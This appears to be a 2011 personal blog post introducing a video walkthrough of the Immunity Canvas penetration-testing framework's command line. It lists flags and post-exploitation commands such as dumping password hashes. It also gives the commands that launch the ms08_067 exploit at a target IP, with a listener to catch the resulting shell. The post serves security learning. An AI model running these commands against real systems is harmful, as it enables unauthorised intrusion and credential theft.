Sunday, April 24, 2011

Immunity Canvas Code and CMDLine Walkthrough

This weekend was my first time playing around with Immunity Canvas. I noticed a lack of documentation for anything Non-Gui based regarding the framework. Since i had such a hard time tracking down information I decided to make a video showing Canvas basic CMDLine usage and tried to explain some module code based on my initial analysis I hope it helps



Note:
I have no previous experience with Canvas but this 20 minute video is everything I learned after playing around for a couple hours and searching everywhere for info..

Whats in this video:
-High Level Explanation of 2 modules(Exploit and Aux)
-CmdLine usage for launching exploits and Aux Modules
-Using PostEx modules after gaining a shell
-Setting up Listeners and finding modules to run


Immunity Canvas Code and CMDLine Walkthrough from ficti0n on Vimeo.


CMDLINE Flags:
-t Target
-p Port
-v Version of OS/target
-l Your listening IP
-d Your Listening port

PostEx Stuff:
help
runmodule getpasswordhashes
shellshocked
ps
killprocess

Running Exploit Without a Listener
./exploits/ms08_067/ms08_067.py -t 192.168.1.65 -v

Running Exploit with Listener
./commandlineinterface.py -v 10 -p 4445
./exploits/ms08_067/ms08_067.py -t 192.168.1.65 -l 192.168.1.121 -d 4445

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

NEW Stealth Reader Design - Field notes and use cases covering updated hardware and functionality

  Significant changes to the new Stealth Readers that add to performance in the field.. Full overview of the last few generations of readers...